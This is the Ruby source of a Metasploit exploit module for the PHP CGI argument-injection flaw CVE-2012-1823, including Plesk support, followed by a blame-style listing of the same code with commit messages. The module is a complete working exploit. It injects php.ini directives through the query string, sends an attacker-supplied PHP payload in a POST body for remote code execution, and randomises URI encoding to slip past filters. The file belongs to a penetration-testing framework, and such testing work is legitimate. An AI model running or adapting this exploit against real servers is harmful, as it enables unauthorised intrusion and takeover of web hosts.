metasploit-framework/modules/exploits/multi/http/php_cgi_arg_injection.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PHP CGI Argument Injection',
			'Description'    => %q{
				When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to
				an argument injection vulnerability.  This module takes advantage of
				the -d flag to set php.ini directives to achieve code execution.
				From the advisory: "if there is NO unescaped '=' in the query string,
				the string is split on '+' (encoded space) characters, urldecoded,
				passed to a function that escapes shell metacharacters (the "encoded in
				a system-defined manner" from the RFC) and then passes them to the CGI
				binary." This module can also be used to exploit the plesk 0day disclosed
				by kingcope and exploited in the wild on June 2013.
			},
			'Author'         =>
				[
					'egypt', 'hdm',  #original msf exploit
					'jjarmoc',       #added URI encoding obfuscation
					'kingcope',      #plesk poc
					'juan vazquez'   #add support for plesk exploitation
				],
			'License'        => MSF_LICENSE,
			'References'     => [
					[ 'CVE', '2012-1823' ],
					[ 'OSVDB', '81633'],
					[ 'OSVDB', '93979'],
					[ 'EDB', '25986'],
					[ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],
					[ 'URL', 'http://kb.parallels.com/en/116241']
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'DisableNops' => true,
					# Arbitrary big number. The payload gets sent as an HTTP
					# response body, so really it's unlimited
					'Space'       => 262144, # 256k
				},
			'DisclosureDate' => 'May 03 2012',
			'Platform'       => 'php',
			'Arch'           => ARCH_PHP,
			'Targets'        => [[ 'Automatic', { }]],
			'DefaultTarget' => 0))

		register_options([
			OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
			OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]),
			OptBool.new('PLESK', [true, "Exploit Plesk", false]),
		], self.class)
	end

	# php-cgi -h
	# ...
	#   -s               Display colour syntax highlighted source.
	def check

		print_status("Checking uri #{uri}")

		response = send_request_raw({ 'uri' => uri })

		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi and not datastore['PLESK']
			print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")
			return Exploit::CheckCode::Unknown
		end

		response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"})
		if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi
			return Exploit::CheckCode::Vulnerable
		end

		if datastore['PLESK'] and response and response.code == 500
			return Exploit::CheckCode::Appears
		end

		print_error("Server responded indicating it was not vulnerable")
		return Exploit::CheckCode::Safe
	end

	def uri
		if datastore['PLESK']
			normalize_uri("phppath", "php")
		else
			normalize_uri(target_uri.path).gsub(/\?.*/, "")
		end
	end

	def uri_encoding_level
		if datastore['PLESK']
			return 0
		else
			return datastore['URIENCODING']
		end
	end

	def exploit
		begin
			args = [
				rand_spaces(),
				create_arg("-d","allow_url_include=#{rand_php_ini_true}"),
				create_arg("-d","safe_mode=#{rand_php_ini_false}"),
				create_arg("-d","suhosin.simulation=#{rand_php_ini_true}"),
				create_arg("-d",'disable_functions=""'),
				create_arg("-d","open_basedir=none"),
				create_arg("-d","auto_prepend_file=php://input"),
				rand_opt_equiv("-n")
			]

			qs = args.join()

			# Has to be all on one line, so gsub out the comments and the newlines
			payload_oneline = "<?php " + payload.encoded.gsub(/\s*#.*$/, "").gsub("\n", "")
			response = send_request_cgi( {
				'method' => "POST",
				'global' => true,
				'uri'    => "#{uri}?#{qs}",
				'data'   => payload_oneline,
			}, 0.5)
			handler

		rescue ::Interrupt
			raise $!
		rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused
			print_error("The target service unreachable")
		rescue ::OpenSSL::SSL::SSLError
			print_error("The target failed to negotiate SSL, is this really an SSL service?")
		end

	end

	def create_arg(arg, val = nil)
		if val
			val = rand_encode(val)
			val.gsub!('=','%3d')   # = must always be encoded
			val.gsub!('"','%22')   # " too
		end

		ret = ''
		ret << "#{rand_spaces}"
		ret << "#{rand_opt_equiv(arg)}"
		ret << "#{rand_space}"
		ret << "#{rand_spaces}"
		ret << "#{val}"
		ret << "#{rand_space}"
	end

	def rand_opt_equiv(opt)
		# Returns a random equivilant option from mapping at
		# http://www.php.net/manual/en/features.commandline.options.php
		opt_equivs = {
			"-d" => [
				"#{rand_dash}#{rand_encode("d")}",
				"#{rand_dash}#{rand_dash}#{rand_encode("define")}"
				],
			"-s" => [
				"#{rand_dash}#{rand_encode("s")}",
				"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}",
				"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}"
				],
			"-T" => [
				"#{rand_dash}#{rand_encode("T")}",
				"#{rand_dash}#{rand_dash}#{rand_encode("timing")}"
				],
			"-n" => [
				"#{rand_dash}#{rand_encode("n")}",
				"#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}"
				]
			}

		equivs = opt_equivs[opt]
		equivs ? equivs[rand(opt_equivs[opt].length)] : opt

	end

	def rand_encode(string, max = string.length)
		# Randomly URI encode characters from string, up to max times.
		chars = [];
		if max > uri_encoding_level then max = uri_encoding_level end
		if string.length == 1
			if rand(2) > 0
				chars << 0
			end
		else
			if max > 0
				max.times { chars << rand(string.length)}
			end
		end
		chars.uniq.sort.reverse.each{|index|  string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}
		string
	end

	def rand_spaces(num = uri_encoding_level)
		ret = ''
		num.times {
			ret << rand_space
		}
		ret
	end

	def rand_space
		uri_encoding_level > 0 ? ["%20","%09","+"][rand(3)] : "+"
	end

	def rand_dash
		uri_encoding_level > 0 ? ["-","%2d","%2D"][rand(3)] : "-"
	end

	def rand_php_ini_false
		Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])
	end

	def rand_php_ini_true
		Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])
	end

end
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
Bump the rank 2012-05-04 15:19:37 +00:00			`Rank = ExcellentRanking`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'PHP CGI Argument Injection',`
			`'Description' => %q{`
			`When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to`
			`an argument injection vulnerability. This module takes advantage of`
			`the -d flag to set php.ini directives to achieve code execution.`
no unicode 2012-05-04 05:01:03 +00:00			`From the advisory: "if there is NO unescaped '=' in the query string,`
			`the string is split on '+' (encoded space) characters, urldecoded,`
			`passed to a function that escapes shell metacharacters (the "encoded in`
			`a system-defined manner" from the RFC) and then passes them to the CGI`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`binary." This module can also be used to exploit the plesk 0day disclosed`
			`by kingcope and exploited in the wild on June 2013.`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`},`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`'Author' =>`
			`[`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`'egypt', 'hdm', #original msf exploit`
			`'jjarmoc', #added URI encoding obfuscation`
			`'kingcope', #plesk poc`
			`'juan vazquez' #add support for plesk exploitation`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`],`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`[ 'CVE', '2012-1823' ],`
add osvdb ref 2012-05-05 15:13:42 +00:00			`[ 'OSVDB', '81633'],`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`[ 'OSVDB', '93979'],`
			`[ 'EDB', '25986'],`
			`[ 'URL', 'http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/' ],`
			`[ 'URL', 'http://kb.parallels.com/en/116241']`
Add hdm's better check method 2012-05-04 01:00:40 +00:00			`],`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`# Arbitrary big number. The payload gets sent as an HTTP`
			`# response body, so really it's unlimited`
			`'Space' => 262144, # 256k`
			`},`
			`'DisclosureDate' => 'May 03 2012',`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Targets' => [[ 'Automatic', { }]],`
			`'DefaultTarget' => 0))`

			`register_options([`
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00			`OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",0]),`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`OptBool.new('PLESK', [true, "Exploit Plesk", false]),`
			`], self.class)`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`end`

Add hdm's better check method 2012-05-04 01:00:40 +00:00			`# php-cgi -h`
			`# ...`
			`# -s Display colour syntax highlighted source.`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`def check`
Add hdm's better check method 2012-05-04 01:00:40 +00:00
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`print_status("Checking uri #{uri}")`
Add hdm's better check method 2012-05-04 01:00:40 +00:00
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`response = send_request_raw({ 'uri' => uri })`
Add hdm's better check method 2012-05-04 01:00:40 +00:00
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi and not datastore['PLESK']`
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`print_error("Server responded in a way that was ambiguous, could not determine whether it was vulnerable")`
Add hdm's better check method 2012-05-04 01:00:40 +00:00			`return Exploit::CheckCode::Unknown`
			`end`
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`response = send_request_raw({ 'uri' => uri + "?#{create_arg("-s")}"})`
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`if response and response.code == 200 and response.body =~ /\<code\>\<span style.*\&lt\;\?/mi`
			`return Exploit::CheckCode::Vulnerable`
			`end`

Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`if datastore['PLESK'] and response and response.code == 500`
			`return Exploit::CheckCode::Appears`
			`end`

Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`print_error("Server responded indicating it was not vulnerable")`
			`return Exploit::CheckCode::Safe`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`end`

Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`def uri`
			`if datastore['PLESK']`
			`normalize_uri("phppath", "php")`
			`else`
			`normalize_uri(target_uri.path).gsub(/\?.*/, "")`
			`end`
			`end`

			`def uri_encoding_level`
			`if datastore['PLESK']`
			`return 0`
			`else`
			`return datastore['URIENCODING']`
			`end`
			`end`

Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`def exploit`
			`begin`
			`args = [`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`rand_spaces(),`
			`create_arg("-d","allow_url_include=#{rand_php_ini_true}"),`
			`create_arg("-d","safe_mode=#{rand_php_ini_false}"),`
			`create_arg("-d","suhosin.simulation=#{rand_php_ini_true}"),`
			`create_arg("-d",'disable_functions=""'),`
			`create_arg("-d","open_basedir=none"),`
			`create_arg("-d","auto_prepend_file=php://input"),`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`rand_opt_equiv("-n")`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`]`

Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`qs = args.join()`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`# Has to be all on one line, so gsub out the comments and the newlines`
Randomize case for ini true/false values 2012-05-04 23:32:07 +00:00			`payload_oneline = "<?php " + payload.encoded.gsub(/\s#.$/, "").gsub("\n", "")`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`response = send_request_cgi( {`
			`'method' => "POST",`
			`'global' => true,`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`'uri' => "#{uri}?#{qs}",`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`'data' => payload_oneline,`
Fix up the PHP CGI exploit, remove debug lines 2012-05-04 14:58:10 +00:00			`}, 0.5)`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`handler`

			`rescue ::Interrupt`
			`raise $!`
			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused`
			`print_error("The target service unreachable")`
			`rescue ::OpenSSL::SSL::SSLError`
			`print_error("The target failed to negotiate SSL, is this really an SSL service?")`
			`end`
Randomize case for ini true/false values 2012-05-04 23:32:07 +00:00
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`def create_arg(arg, val = nil)`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`if val`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00			`val = rand_encode(val)`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`val.gsub!('=','%3d') # = must always be encoded`
" is 0x22, duh. 2012-06-13 01:00:28 +00:00			`val.gsub!('"','%22') # " too`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`ret = ''`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`ret << "#{rand_spaces}"`
			`ret << "#{rand_opt_equiv(arg)}"`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`ret << "#{rand_space}"`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`ret << "#{rand_spaces}"`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`ret << "#{val}"`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`ret << "#{rand_space}"`
			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`def rand_opt_equiv(opt)`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00			`# Returns a random equivilant option from mapping at`
			`# http://www.php.net/manual/en/features.commandline.options.php`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`opt_equivs = {`
			`"-d" => [`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`"#{rand_dash}#{rand_encode("d")}",`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`"#{rand_dash}#{rand_dash}#{rand_encode("define")}"`
			`],`
			`"-s" => [`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`"#{rand_dash}#{rand_encode("s")}",`
			`"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlight")}",`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`"#{rand_dash}#{rand_dash}#{rand_encode("syntax-highlighting")}"`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`],`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`"-T" => [`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`"#{rand_dash}#{rand_encode("T")}",`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`"#{rand_dash}#{rand_dash}#{rand_encode("timing")}"`
			`],`
			`"-n" => [`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`"#{rand_dash}#{rand_encode("n")}",`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`"#{rand_dash}#{rand_dash}#{rand_encode("no-php-ini")}"`
			`]`
			`}`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`equivs = opt_equivs[opt]`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`equivs ? equivs[rand(opt_equivs[opt].length)] : opt`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`def rand_encode(string, max = string.length)`
randomizes options from equivilants 2012-05-11 16:31:26 +00:00			`# Randomly URI encode characters from string, up to max times.`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`chars = [];`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`if max > uri_encoding_level then max = uri_encoding_level end`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`if string.length == 1`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`if rand(2) > 0`
			`chars << 0`
			`end`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00			`else`
			`if max > 0`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`max.times { chars << rand(string.length)}`
			`end`
			`end`
Fixed ruby 1.9 String Indexing issue, using Rex::Text.uri_encode 2012-06-12 19:59:06 +00:00			`chars.uniq.sort.reverse.each{\|index\| string[index] = Rex::Text.uri_encode(string[index,1], "hex-all")}`
Lots of encoding randomizations for php_cgi_arg_injection 2012-05-09 19:13:21 +00:00			`string`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`def rand_spaces(num = uri_encoding_level)`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`ret = ''`
Some msftidy fixes 2012-10-15 00:16:54 +00:00			`num.times {`
			`ret << rand_space`
			`}`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00			`ret`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`end`
Change the default state to make it work on Metasploitable by default 2012-06-13 05:43:59 +00:00
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`def rand_space`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`uri_encoding_level > 0 ? ["%20","%09","+"][rand(3)] : "+"`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`end`
Comply with msftidy Knock, knock! Who's there? Me, the msftidy nazi! 2012-08-07 20:59:01 +00:00
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`def rand_dash`
Add support for PLESK on php_cgi_arg_injection 2013-07-04 13:24:25 +00:00			`uri_encoding_level > 0 ? ["-","%2d","%2D"][rand(3)] : "-"`
Added lots or encoding randomness 2012-05-09 16:01:15 +00:00			`end`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00
			`def rand_php_ini_false`
Randomize case for ini true/false values 2012-05-04 23:32:07 +00:00			`Rex::Text.to_rand_case([ "0", "off", "false" ][rand(3)])`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`end`

			`def rand_php_ini_true`
Randomize case for ini true/false values 2012-05-04 23:32:07 +00:00			`Rex::Text.to_rand_case([ "1", "on", "true" ][rand(3)])`
Add an exploit module for the recent php cgi bug (CVE-2012-1823) 2012-05-04 00:50:51 +00:00			`end`

			`end`